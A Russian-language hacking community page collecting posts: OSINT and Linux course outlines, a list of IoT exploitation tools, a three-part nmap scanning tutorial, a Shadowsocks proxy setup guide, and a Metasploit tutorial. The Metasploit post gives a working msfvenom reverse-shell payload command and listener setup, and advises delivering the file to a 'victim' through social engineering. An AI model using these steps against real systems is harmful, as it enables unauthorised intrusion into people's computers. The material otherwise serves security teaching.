Сообщество - Life-Hack [Жизнь-Взлом]/Хакинг
Добавить пост

Life-Hack [Жизнь-Взлом]/Хакинг

248 постов 2 690 подписчиков

Популярные теги в сообществе:

Курс "OSINT для новичков"

На первой неделе курса "OSINT для новичков" мы изучили основы OSINT, типы сбора информации, плюсы и минусы OSINT,  познакомились с правовыми ограничениями, Google Dorks и разобрались, что такое цифровой след.

Если вы что-то пропустили и желаете прочитать, то вот список материалов первой недели:

Первая серия материалов - "Введение в OSINT":

• Введение в OSINT

• Стороны, заинтересованные в OSINT информации

• Типы сбора информации

• Преимущества и проблемы OSINT

• Правовые и этические ограничения

• Цифровой след

• Google Dorking

Не забывайте следить и делиться нашим бесплатным курсом "OSINT для новичков"!

Следующую неделю мы посвятим теме «OSINT инструменты».

Ссылка на источник

Бесплатный теоретический курс "Linux для новичков"

Курс был составлен из различных модулей, предназначенных для ознакомления с основными аспектами работы в операционной системе Linux.

В рамках курса были изучены основы работы с файлами и директориями, управление пользователями и группами, сетевые возможности Linux, мониторинг, журналирование и проверка безопасности. Также были рассмотрены темы работы с данными и дисками в Linux, туннелирование трафика и полезные инструменты для взлома.

Неделя 1: Введение в Linux
• Что такое Linux и почему его выбирают?
• Основные дистрибутивы Linux: Ubuntu, Fedora, CentOS и др.
• Установка Linux: дуализм с Windows, LiveCD и виртуальные машины.
• Основные команды командной строки Linux: cd, ls, mkdir, rm и др.
• Структура файловой системы Linux: /bin, /etc, /home и др.
• Пакетный менеджер APT для установки и обновления программ.
• Основы текстового редактора nano: открытие, редактирование и сохранение файлов.

Неделя 2: Работа с файлами и директориями
• Основные команды для работы с файлами и директориями: cp, mv, rm и др.
• Работа с архивами в Linux: создание, разархивирование, просмотр.
• Поиск файлов и содержимого в Linux: команды find и grep.
• Управление правами доступа к файлам и директориям в Linux: chmod и chown.
• Символьные и жесткие ссылки: создание и использование.
• Управление процессами и задачами в Linux: команды ps, top, kill и др.
• Автоматическое выполнение задач с помощью cron.

Неделя 3: Управление пользователями и группами
• Создание и удаление пользователей в Linux: команды useradd и userdel.
• Управление паролями пользователей: команда passwd.
• Назначение пользователей в группы: команда usermod.
• Создание и удаление групп в Linux: команды groupadd и groupdel.
• Управление правами доступа к файлам и директориям для пользователей и групп.
• Просмотр информации о пользователях и группах: команды id, whoami и др.
• Ограничение доступа пользователей к определенным ресурсам: команды chroot и sudo.

Неделя 4: Сетевые возможности Linux
• Конфигурация сети в Linux: настройка IP-адреса, маски подсети, шлюза.
• Проверка сетевого подключения: команда ping.
• Конфигурация сетевых интерфейсов: команды ifconfig и ip.
• Работа с удаленными хостами через SSH: подключение, передача файлов.
• Конфигурация DNS-сервера в Linux: файл /etc/resolv.conf.
• Настройка файрвола в Linux: команда iptables.
• Основы настройки и использования сетевых служб в Linux: FTP, Samba и др.
• Основы настройки и использования сетевых служб в Linux: Apache.

Неделя 5: Мониторинг, журналирование, проверка безопасности.
• Лог файлы системы Linux
• Как настроить центральный сервер ведения логов с помощью Rsyslog в Linux.
• Анализ лог-файлов: команды grep, awk, sed.
• Настройка системы мониторинга и аудита: утилиты auditd, nmon.
• Система мониторинга Zabbix
• Мониторинг сети с помощью tcpdump
• Проверка безопасности системы с помощью LinPEAS

Неделя 6: Работа с данными и дисками в Linux
• Использование утилиты rsync для синхронизации данных.
• Основы языка сценариев Bash: переменные, условия, циклы.
• Создание и выполнение сценариев Bash: утилита bash.
• Работа с образами дисков: команды dd, ddrescue.
• Восстановление данных с помощью LiveCD.
• Создание и настройка RAID-массивов для защиты данных.
• Дефрагментация диска Linux

Неделя7: Туннелирование трафика
• Установка и настройка OpenVPN сервера на Ubuntu
• Простая настройка WireGuard Linux.
• Настройка Shadowsocks.
• Pivoting: Chisel
• SSH туннели
• Проксирование трафика с помощью proxychains
• Pivoting: Lugolo-ng

Неделя 8: Полезные инструменты для взлома
• nmap 1 часть
• nmap 2 часть
• nmap 3 часть
• crackmapexec
• metasploit
• Burp Suite
• sqlmap

Не забывайте сохранить и поделиться нашим бесплатным курсом "Linux для новичков"!

Ссылка на курс

Показать полностью

Топ инструментов для поиска и эксплуатации уязвимостей в IoT:

Топ инструментов для поиска и эксплуатации уязвимостей в IoT: Хакеры, IT, Информационная безопасность, Инструменты, Github, Софт

PRET - Printer Exploitation Toolkit - Инструмент для тестирования безопасности принтеров.

Expliot - Платформа для тестирования безопасности и эксплуатации устройств IoT

HomePwn  - Фреймворк, предоставляющий функции для аудита и пентестинга устройств, которые сотрудники компании могут использовать в своей повседневной работе и в пределах той же сети.

Praeda - Инструмент для автоматизированного сбора данных и извлечения информации из сетевых устройств.

AttifyOS - Интегрированная операционная система для тестирования безопасности устройств Интернета вещей.

RouterSploit - Фреймворк, имитирующий уязвимости маршрутизатора, написанный на Python.

Peniot - Инструмент для пентестинга и аудита устройств Интернета вещей.

ISF (Industrial Security Framework) - Фреймворк для тестирования промышленных систем управления.

IoTSeeker - Инструмент для обнаружения устройств IoT с паролями по умолчанию.

Kamerka - Инструмент для визуализации географического положения камер безопасности, найденных через API Shodan.

Cameradar - Инструмент для тестирования на проникновение в камеры, использующий протокол RTSP.

Поисковые системы:

IVRE: фреймворк, который включает в себя модули для выполнения пассивного и активного сканирования, обработки и представления данных. IVRE основан на открытом программном обеспечении и может использоваться для анализа трафика и выполнения пентестинга.

Wigle: платформа для сбора, визуализации и анализа данных о беспроводных сетях по всему миру. Может быть полезна для идентификации и отслеживания местоположения беспроводных устройств.

Netlas: поисковая система для цифровых активов и их уязвимостей. Сканирует весь интернет и собирает информацию о каждом связанном устройстве, сервере и веб-сайте.

Censys: поисковая система, которая позволяет исследователям безопасности обнаруживать и анализировать все устройства и сети, подключенные к Интернету.

Мы в телеграме, подпишись.

Показать полностью 1

Metasploit

Metasploit Хакеры, Информационная безопасность, Linux, IT, Софт, Взлом, Длиннопост

Metasploit Framework - это мощный инструмент, который может быть использован как злоумышленниками, так и этичными хакерами и специалистами по тестированию на проникновение для исследования уязвимостей в сетях и на серверах.

Проект Metasploit был создан на языке Perl в 2003 году Эйч Ди Муром (H.D. Moore) при содействии основного разработчика Мэтта Миллера для использования в качестве портативного сетевого инструмента. Он был полностью переведен на язык Ruby к 2007 году, а в 2009 году лицензию приобрела Rapid7, и теперь этот инструмент остается частью ассортимента этой компании, специализирующейся на разработке систем обнаружения вторжений и инструментов эксплуатации уязвимостей систем удаленного доступа.

Этот фреймворк стал основным инструментом разработки эксплойтов. До Metasploit пентестерам приходилось выполнять все проверки вручную, используя различные инструменты, которые могли поддерживать или не поддерживать тестируемую платформу, а также вручную писать собственный код для эксплуатации уязвимостей.

Основными компонентами инструмента являются эксплойты и пэйлоады.

Эксплойт - это код, который эксплуатирует ошибку, неверную настройку или системный сбой — любую брешь в защите. Эксплойт помогает найти ее, а потом воспользоваться, чтобы получить контроль над целевой системой. Создавать эксплойты лучше самостоятельно, но с Metasploit это быстрее и проще. Во фреймворке есть образцы готового кода.

Пэйлоады. Когда эксплойт получает доступ к системе, выполняется определенный код. Его называют пэйлоадом, или полезной нагрузкой. Обычно это шелл-код — команды, написанные на языке оболочки операционной системы, то есть для консоли ОС. Пэйлоад нужен, чтобы установить соединение, запустить вредоносный код или выполнить другую операцию.

Дополнительные модули Metasploit позволяют просканировать сеть и проанализировать трафик, который через нее идет. Это необходимо на начальном этапе атаки — так пентестер получает информацию, нужную для проникновения.

В состав фреймворка входят:

  • библиотеки — в первую очередь библиотека Rex для основных операций. На ней базируются другие — MSF Core и MSF Base. Вместе они составляют основное ядро команд Metasploit;

  • модули — эксплойты, пэйлоады и прочие, о которых рассказывали выше;

  • инструменты — дополнительное ПО для работы;

  • вспомогательные плагины;

  • интерфейсы — то, с помощью чего пользователь взаимодействует с Metasploit. По умолчанию это доступ через консоль или CLI — консольное приложение. Можно установить или настроить графический интерфейс.

Metasploit Хакеры, Информационная безопасность, Linux, IT, Софт, Взлом, Длиннопост

MSFVenom — бесплатный инструмент для создания полезной нагрузки (вредоносного файла). Это, так сказать, двоюродный брат Metasploit. С его помощью вы можете создавать различные полезные нагрузки, шелл-код и обратный шелл.

Reverse TCP (обратное подключение, обратный шелл, пэйлоад) — схема взаимодействия с целевым компьютером. Мы создаем вредоносный файл (полезную нагрузку), после запуска которого целевой компьютер будет пытаться подключиться к нашему компьютеру. Это называется «бэкконнект» или обратный шелл.

Чтобы узнать, какие полезные нагрузки доступны введите команду:

msfvenom -l payloads

Следующая команда создаст вредоносный исполняемый файл (обратный шелл), после запуска которого откроется сеанс Meterpreter.

  • LHOST — IP-адрес вашего компьютера (атакующего).

  • LPORT — порт вашего компьютера, который назначен серверу или программе.

  • P — сокращение от «payload», полезная нагрузка для выбранной платформы.

  • F — параметр, который задает тип файла, например, exe для Windows.

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.13 LPORT=4444 -f exe -a x64 -o payload.exe

Мы создали пэйлоад, теперь переходим к следующему этапу. Запускаем msfconsole и вводим команды:

msf> use exploit/multi/handler
msf> set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf> set LHOST 192.168.1.13
msf> set LPORT 4444
msf> run

Этой операцией мы позволяем принять подключение от созданного нами ранее обратного шелла, который запустит жертва.

После создания вредоносного файла необходимо отправить его жертве. Вы можете использовать методы социальной инженерии или любой другой способ доставки вредоносного файла.

После запуска созданного файла откроется сессия Meterpreter:

Metasploit Хакеры, Информационная безопасность, Linux, IT, Софт, Взлом, Длиннопост

Поздравляю, вы получили доступ к компьютеру.

Информация предоставлена для информационных целей.

Мы в телеграме

Показать полностью 2

NMAP. 3 часть

NMAP. 3 часть Хакеры, Информационная безопасность, Linux, IT, Софт, Инструменты, Длиннопост

Часть 1 тут

Часть 2 тут

Nmap Scripting Engine (NSE) — еще одна удобная функция Nmap. Она дает нам возможность создавать скрипты на Lua для взаимодействия с определенными сервисами. Всего существует 14 категорий, на которые можно разделить эти скрипты:

auth  Определение учетных данных для аутентификации.

broadcast  Скрипты, которые используются для обнаружения узлов сети с помощью широковещательной рассылки, могут быть автоматически добавлены к остальным сканированиям.

brute  Выполняет сценарии, которые пытаются войти в соответствующую службу путем перебора учетных данных.

default  Сценарии по умолчанию, выполняемые с помощью параметра -sC.

discovery  Оценка доступных услуг.

dos  Эти скрипты используются для проверки сервисов на наличие уязвимостей типа «отказ в обслуживании» и используются реже, так как это наносит вред сервисам.

exploit  Эта категория скриптов пытается эксплуатировать известные уязвимости для сканируемого порта.

external  Скрипты, использующие внешние сервисы для дальнейшей обработки.

fuzzer  Скрипты для выявления уязвимостей и обработки неожиданных пакетов путем отправки различных полей, что может занять много времени.

intrusive  Скрипты, которые могут негативно повлиять на целевую систему.

malware  Проверяет, не заразило ли целевую систему какое-либо вредоносное ПО.

safe  Безопасные сценарии, которые не осуществляют деструктивных действий.

version  Расширение для обнаружения служб.

vuln  Идентификация конкретных уязвимостей.

Сценарии по умолчанию:

$ sudo nmap <target> -sC

Сценарии определенной категории:

$ sudo nmap <target> --script <category>

Определенные скрипты:

$ sudo nmap <target> --script <script-name>,<script-name>,...

Пример:

$ sudo nmap 10.129.2.28 -p 25 --script banner,smtp-commands
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-16 23:21 CEST
Nmap scan report for 10.129.2.28
Host is up (0.050s latency).

PORT STATE SERVICE
25/tcp open smtp
|_banner: 220 inlane ESMTP Postfix (Ubuntu)
|_smtp-commands: inlane, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8,
MAC Address: DE:AD:00:00:BE:EF (Intel Corporate)

Мы видим, что можем распознать дистрибутив Linux Ubuntu с помощью сценария «banner». Скрипт «smtp-commands» показывает нам, какие команды мы можем использовать при взаимодействии с целевым SMTP-сервером. В этом примере такая информация может помочь нам найти существующих пользователей. Nmap также дает нам возможность сканировать нашу цель с помощью агрессивной опции (-A). При этом цель сканируется с использованием нескольких параметров, таких как обнаружение служб (-sV), обнаружение ОС (-O), трассировка (--traceroute) и сценарии NSE по умолчанию (-sC).

$ sudo nmap 10.129.2.28 -p 80 -A
Starting Nmap 7.80 ( https://nmap.org ) at 2024-04-17 01:38 CEST
Nmap scan report for 10.129.2.28
Host is up (0.012s latency).

PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-generator: WordPress 5.3.4
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: blog.inlanefreight.com
MAC Address: DE:AD:00:00:BE:EF (Intel Corporate)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 2.6.32 (96%), Linux 3.2 - 4.9 (96%), Linux 2.6.32 - 3.10 (96%), Linux 3.4 - 3.10 (95%), Linux 3.1 (95%), Linux 3.2 (95%),
AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), Synology DiskStation Manager 5.2-5644 (94%), Netgear RAIDiator 4.2.28 (94%), Linux 2.6.32 - 2.6.35 (94%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop

TRACEROUTE
HOP RTT ADDRESS 1 11.91 ms 10.129.2.28

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.36 seconds

С помощью параметра сканирования (-A) мы выяснили, какой веб-сервер (Apache 2.4.29) запущен в системе, какое веб-приложение (WordPress 5.3.4) используется, а также заголовок (blog.inlanefreight.com) веб-страницы. Кроме того, Nmap показывает, что это, скорее всего, операционная система Linux (96%).

Nmap предлагает нам шесть различных шаблонов синхронизации (-T <0-5>). Эти значения (0–5) определяют агрессивность нашего сканирования. Если сканирование слишком агрессивное, то системы безопасности могут заблокировать нас из-за создаваемого сетевого трафика. Шаблон синхронизации по умолчанию -T 3.

  • -T 0 / -T paranoid

  • -T 1 / -T sneaky

  • -T 2 / -T polite

  • -T 3 / -T normal

  • -T 4 / -T aggressive

  • -T 5 / -T insane

Мы в телеграме

Показать полностью

NMAP. 2 часть

NMAP. 2 часть Информационная безопасность, Хакеры, Linux, Софт, Инструменты, Длиннопост

Часть 1 тут

Во время тестирования на проникновение, нередко предоставляют список IP-адресов с хостами, которые нам нужно протестировать. Nmap имеет возможность работать со списками, вместо того, чтобы вручную вводить их.

Такой список может выглядеть примерно так:

$ cat hosts.lst
10.129.2.4
10.129.2.10
10.129.2.11
10.129.2.18
10.129.2.19
10.129.2.20
10.129.2.28

Для сканирования предопределенного списка, команда будет выглядеть так:

$ sudo nmap -sn -oA tnet -iL hosts.lst | grep for | cut -d" " -f5
10.129.2.18
10.129.2.19
10.129.2.20

Здесь, -sn - запрет сканирования портов, -oA tnet - указание сохранить результат во всех форматах, с именем 'tnet', -iL - провести сканирование целей, указанных в списке 'hosts.lst'.

В этом примере мы видим, что активны только 3 хоста из 7. Это может означать, что другие хосты игнорируют эхо-запросы ICMP по умолчанию из-за настроек их брандмауэра. Поскольку Nmap не получает ответа, он помечает эти хосты как неактивные.

Если нужно просканировать только небольшую часть сети, можно указать несколько IP-адресов.

$ sudo nmap -sn -oA tnet 10.129.2.18 10.129.2.19 10.129.2.20| grep for | cut -d" " -f5
10.129.2.18
10.129.2.19
10.129.2.20

Или так:

$ sudo nmap -sn -oA tnet 10.129.2.18-20| grep for | cut -d" " -f5
10.129.2.18
10.129.2.19
10.129.2.20

По умолчанию Nmap сканирует 1000 популярных TCP-портов с помощью сканирования SYN (-sS). Для этого сканирования необходимы права пользователя root, поскольку для создания сырых TCP-пакетов необходимы разрешения сокета. В противном случае выполняется сканирование TCP (-sT). Если мы не определяем порты и методы сканирования, эти параметры устанавливаются автоматически. Мы можем определить порты один за другим (-p 22,25,80,139,445), или в виде диапазона (-p 22-445), по популярности (--top-ports=10). Для сканирования всех портов применяется параметр -p-, а для быстрого сканирования, которое содержит 100 самых популярных портов -F.

$ sudo nmap 10.129.2.28 --top-ports=10
Starting Nmap 7.80 ( https://nmap.org ) at 2024-04-15 15:36 CEST Nmap scan report for 10.129.2.28 Host is up (0.021s latency).
PORT STATE SERVICE
21/tcp closed ftp
22/tcp open ssh
23/tcp closed telnet
25/tcp open smtp
80/tcp open http
110/tcp open pop3
139/tcp filtered netbios-ssn
443/tcp closed https
445/tcp filtered microsoft-ds
3389/tcp closed ms-wbt-server
MAC Address: DE:AD:00:00:BE:EF (Intel Corporate)
Nmap done: 1 IP address (1 host up) scanned in 1.44 seconds

Здесь, 10.129.2.28 - цель, --top-ports=10 - сканировать 10 самых популярных портов.

$ sudo nmap 10.129.2.28 -p 21 --packet-trace -Pn -n --disable-arp-ping
Starting Nmap 7.80 ( https://nmap.org ) at 2024-04-15 15:39 CEST
SENT (0.0429s) TCP 10.10.14.2:63090 > 10.129.2.28:21 S ttl=56 id=57322
iplen=44 seq=1699105818 win=1024 <mss 1460>
RCVD (0.0573s) TCP 10.129.2.28:21 > 10.10.14.2:63090 RA ttl=64 id=0 iplen=40 seq=0 win=0
Nmap scan report for 10.11.1.28
Host is up (0.014s latency).
PORT STATE SERVICE
21/tcp closed ftp
MAC Address: DE:AD:00:00:BE:EF (Intel Corporate)
Nmap done: 1 IP address (1 host up) scanned in 0.07 seconds

В данном примере 10.129.2.28 - целевой хост, -p 21 - порт для сканирования, --packet-trace - указание, показать все отправленные и принятые пакеты, -n - запрет DNS resolution, --disable-arp-ping - запрет ARP.

Некоторые системные администраторы иногда забывают фильтровать порты UDP. Поскольку UDP является протоколом без сохранения состояния и не требует трехстороннего рукопожатия, мы не получаем никакого подтверждения. Следовательно, время ожидания намного больше, что делает сканирование UDP (-sU) намного медленнее, чем сканирование TCP (-sS).

Давайте на примере рассмотрим, как может выглядеть UDP-сканирование (-sU) и какие результаты оно нам дает.

$ sudo nmap 10.129.2.28 -F -sU
Starting Nmap 7.80 ( https://nmap.org ) at 2024-04-15 16:01 CEST
Nmap scan report for 10.129.2.28
Host is up (0.059s latency).
Not shown: 95 closed ports
PORT STATE SERVICE
68/udp open|filtered dhcpc
137/udp open netbios-ns
138/udp open|filtered netbios-dgm
631/udp open|filtered ipp
5353/udp open zeroconf MAC Address: DE:AD:00:00:BE:EF (Intel Corporate)
Nmap done: 1 IP address (1 host up) scanned in 98.07 seconds

Здесь, 10.129.2.28 - цель, -F - сканирование 100 самых популярных портов, -sU - UDP сканирование.

Еще один удобный метод сканирования портов — опция -sV, которая используется для получения дополнительной доступной информации об открытых портах. Этот метод может определять версии, имена сервисов и подробную информацию о цели.

$ sudo nmap 10.129.2.28 -Pn -n --disable-arp-ping --packet-trace -p 445 --reason -sV
Starting Nmap 7.80 ( https://nmap.org ) at 2024-11-04 11:10 GMT
SENT (0.3426s) TCP 10.10.14.2:44641 > 10.129.2.28:445 S ttl=55 id=43401
iplen=44 seq=3589068008 win=1024 <mss 1460>
RCVD (0.3556s) TCP 10.129.2.28:445 > 10.10.14.2:44641 SA ttl=63 id=0
iplen=44 seq=2881527699 win=29200 <mss 1337>
NSOCK INFO [0.4980s] nsock_iod_new2(): nsock_iod_new (IOD #1)
NSOCK INFO [0.4980s] nsock_connect_tcp(): TCP connection requested to
10.129.2.28:445 (IOD #1) EID 8
NSOCK INFO [0.5130s] nsock_trace_handler_callback(): Callback: CONNECT
SUCCESS for EID 8 [10.129.2.28:445]
Service scan sending probe NULL to 10.129.2.28:445 (tcp)
NSOCK INFO [0.5130s] nsock_read(): Read request from IOD #1 [10.129.2.28:445]
(timeout: 6000ms) EID 18
NSOCK INFO [6.5190s] nsock_trace_handler_callback(): Callback: READ TIMEOUT for EID 18 [10.129.2.28:445] Service scan sending probe SMBProgNeg to 10.129.2.28:445 (tcp)
NSOCK INFO [6.5190s] nsock_write(): Write request for 168 bytes to IOD #1 EID 27 [10.129.2.28:445] NSOCK INFO [6.5190s] nsock_read(): Read request from IOD #1 [10.129.2.28:445] (timeout: 5000ms) EID 34
NSOCK INFO [6.5190s] nsock_trace_handler_callback(): Callback: WRITE SUCCESS for EID 27 [10.129.2.28:445]
NSOCK INFO [6.5320s] nsock_trace_handler_callback(): Callback: READ SUCCESS for EID 34 [10.129.2.28:445] (135 bytes)
Service scan match (Probe SMBProgNeg matched with SMBProgNeg line 13836): 10.129.2.28:445 is netbios-ssn. Version: |Samba smbd|3.X - 4.X|workgroup: WORKGROUP|
NSOCK INFO [6.5320s] nsock_iod_delete(): nsock_iod_delete (IOD #1)
Nmap scan report for 10.129.2.28
Host is up, received user-set (0.013s latency).

PORT STATE SERVICE REASON VERSION
445/tcp open netbios-ssn syn-ack ttl 63 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
Service Info: Host: Ubuntu
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.55 seconds

Здесь, -Pn - запрет ICMP Echo запросов, -n - запрет DNS resolution, --disable-arp-ping - запрет ARP, --packet-trace - указание, показать все отправленные и принятые пакеты, -p 445 - целевой порт, --reason - показать причину состояния порта, -sV - провести сканирование сервиса.

Мы в телеграме, подпишись!

Показать полностью

NMAP. 1 часть

NMAP. 1 часть Linux, Взлом, Информационная безопасность, Хакеры, Инструменты, Длиннопост

Network Mapper (Nmap) — это инструмент сетевого анализа и аудита безопасности с открытым исходным кодом, написанный на C, C++, Python и Lua. Он предназначен для сканирования сетей и определения доступных в сети хостов, а также служб и приложений, включая имя и версию. Он также может идентифицировать операционную систему этих хостов. Помимо других функций, Nmap также предлагает возможности сканирования, которые могут определить, настроены ли фильтры пакетов, межсетевые экраны или системы обнаружения вторжений (IDS) необходимым образом.

Nmap является одним из наиболее часто используемых инструментов, среди сетевых администраторов и специалистов по информационной безопасности. Он используется для:

  • Аудита аспектов безопасности сетей;

  • Тестирования на проникновение;

  • Проверки настроек и конфигурации брандмауэра и IDS;

  • Отображения сети;

  • Анализа ответов сетевых устройств;

  • Определения открытых портов;

  • Оценки защищенности сетевых устройств;

Nmap предлагает множество различных типов сканирования, которые можно использовать для получения различных результатов о наших целях. По сути, Nmap применяет следующие методы сканирования:

  • Host discovery

  • Port scanning

  • Service enumeration and detection

  • OS detection

  • Scriptable interaction with the target service (Nmap Scripting Engine)

Синтаксис Nmap довольно прост и выглядит следующим образом:

nmap <scan types> <options> <target>

Например, сканирование TCP-SYN (-sS) является одним из параметров по умолчанию, если мы не определили иное, а также одним из самых популярных методов сканирования. Этот метод сканирования позволяет сканировать несколько тысяч портов в секунду. Сканирование TCP-SYN отправляет один пакет с флагом SYN и, следовательно, никогда не завершает трехстороннее подтверждение связи, в результате чего не устанавливается полное TCP-соединение со сканируемым портом.

Если Nmap получает пакет с флагом SYN-ACK, он принимает решение, что порт открыт.

Если в пакете содержится флаг RST, это индикатор того, что порт закрыт.

Если Nmap не получит пакет обратно, он отобразит его как отфильтрованный. В зависимости от конфигурации брандмауэра некоторые пакеты могут быть отброшены или проигнорированы.

Разберем такой пример:

$ sudo nmap -sS localhost
Starting Nmap 7.80 ( https://nmap.org ) at 2024-04-12 22:50 UTC
Nmap scan report for localhost (127.0.0.1)
Host is up (0.000010s latency).
Not shown: 996 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
5432/tcp open postgresql
5901/tcp open vnc-1
Nmap done: 1 IP address (1 host up) scanned in 0.18 seconds

Мы видим, что у нас открыты четыре разных TCP-порта. В первом столбце мы видим номер порта. Затем во втором столбце мы видим статус службы, а в третьем - тип этой службы.

Например, когда нам нужно провести сканирование сети, мы должны иметь представление о том, какие устройства находятся в этой сети. Существует множество опций, с помощью которых Nmap определит жива наша цель или нет. Самый эффективный метод обнаружения хоста — использование эхо-запросов ICMP.

Всегда рекомендуется сохранять каждое сканирование. Позже это можно будет использовать для сравнения, документирования и составления отчетов. Ведь разные инструменты могут давать разные результаты.

$ sudo nmap 10.129.2.0/24 -sn -oA tnet | grep for | cut -d" " -f5
10.129.2.4
10.129.2.10
10.129.2.11
10.129.2.18
10.129.2.19
10.129.2.20
10.129.2.28

Здесь 10.129.2.0/24  - целевая сеть, -sn - запрет сканирования портов, -oA tnet - указание сохранить результаты во всех форматах, с именем 'tnet'.

Мы в телеграме

Показать полностью

Настройка Shadowsocks

Настройка Shadowsocks Linux, VPN, Информационная безопасность, IT, Длиннопост

Большинство распространённых протоколов VPN, вроде OpenVPN можно заблокировать. Однако есть решение - технология Shadowsocks. Эта технология работает по принципу прокси, но с шифрованием. Она маскируется под https трафик, поэтому использование этого протокола сложно вычислить и заблокировать. В этой статье мы рассмотрим как выполняется настройка Shadowsocks Ubuntu

Прежде всего, обратите внимание, что для работы Shadowsocks, как собственно и для VPN вам понадобится сервер, в стране, где нужные вам сайты не заблокированы. Именно на этом сервере устанавливается сервер Shadowsocks. На вашем компьютере или телефоне устанавливается клиент, который подключается к этому серверу. Между вашим клиентом и сервером трафик будет зашифрован поэтому провайдер, не сможет понять какой сайт вы открываете, поэтому не заблокирует его. А уже на сервере запрос будет расшифрован и в открытом виде поступит на сайт.

Реализация shadowsocks на Си есть в официальных репозиториях Ubuntu. Вы можете установить её с помощью команды:

sudo apt install shadowsocks-libev

Конфигурационный файл shadowsocks находится по пути /etc/shadowsocks-libev/config.json и по умолчанию выглядит вот так:

{
"server":["::1", "127.0.0.1"],
"mode":"tcp_and_udp",
"server_port":8388,
"local_port":1080,
"password":"<Password>",
"timeout":86400,
"method":"chacha20-ietf-poly1305"
}

Вот что означают эти сроки:

  • server - IP адрес, на котором программа будет ожидать соединений, должно соответствовать внешнему IP адресу вашего сервера.

  • mode - указывает какой протокол соединение использовать - tcp, udp или оба.

  • server_port - порт сервера, который вы будете использовать для подключения, по умолчанию - 8388.

  • local_port - порт клиента, к которому будет подключаться браузер по протоколу SOCS5.

  • password - пароль, который будет использоваться клиентами для подключения.

  • method - метод шифрования, по умолчанию используется chacha20-ietf-poly1305.

Для начала работы с shadowsocks надо установить в поле server внешний IP адрес вашего сервера. Также в поле password, надо прописать пароль, который будет использоваться на клиенте для подключения к серверу. Всё остальное можно оставить по умолчанию. Также после внесения изменений в конфигурационный файл необходимо перезапустить сервис:

sudo systemctl restart shadowsocks-libev

На этом базовая настройка закончена, можно переходить к подключению. Если вы хотите запустить сервер для отладки, чтобы видеть всё, что происходит, можете остановить systemd службу и запустить его вручную:

/usr/bin/ss-server -c /etc/shadowsocks-libev/config.json

Для подключения вам понадобится клиент. В Linux можно использовать GUI клиент от Outline. Однако и его мы не будем рассматривать в этой статье. Мы поговорим про использование консольного клиента. Его можно получить установив тот же пакет, что и для сервера. Вы можете собрать его из исходников, как описано выше или установить из репозиториев дистрибутива:

sudo apt install shadowsocks-libev

После установки нужно отредактировать конфигурационный файл, так чтобы он был таким же как и на сервере. Например:

{
"server": "<remote_server_ip",
"mode":"tcp_and_udp",
"server_port":8388,
"local_port":1080,
"password":"<Password_from_remote_server_config>",
"timeout":86400, "method":"chacha20-ietf-poly1305"
}

После этого можно запустить клиент:

sudo ss-local -v -c /etc/shadowsocks-libev/config.json

Опция -v здесь означает максимально подробный вывод, а -c - указывает путь к конфигурационному файлу. Клиент запущен, но ваш трафик ещё не перенаправляется через тоннель. Для этого надо настроить подключение к прокси в вашем браузере. Клиент ожидает соединений от браузера на порту 1080 (по умолчанию).

Для настройки прокси в Firefox откройте Настройки. В разделе Основные пролистайте в самый низ и найдите Параметры сети, тут нажмите Настроить и в открывшемся окне введите адрес 127.0.0.1 и порт 1080. После этого Firefox будет использовать Shadowsocks для открытия сайтов. Если вы откроете сайт eth0.me, то увидите, что ваш IP адрес соответствует адресу сервера, на котором установлен Shadowsocks.

Обратите внимание, что многие провайдеры блокируют сайты по DNS, так что лучше в настройках своего роутера указать DNS Google - 8.8.8.8 или включить в браузере DNS over HTTPS.

Мы в телеграме

Показать полностью
Отличная работа, все прочитано!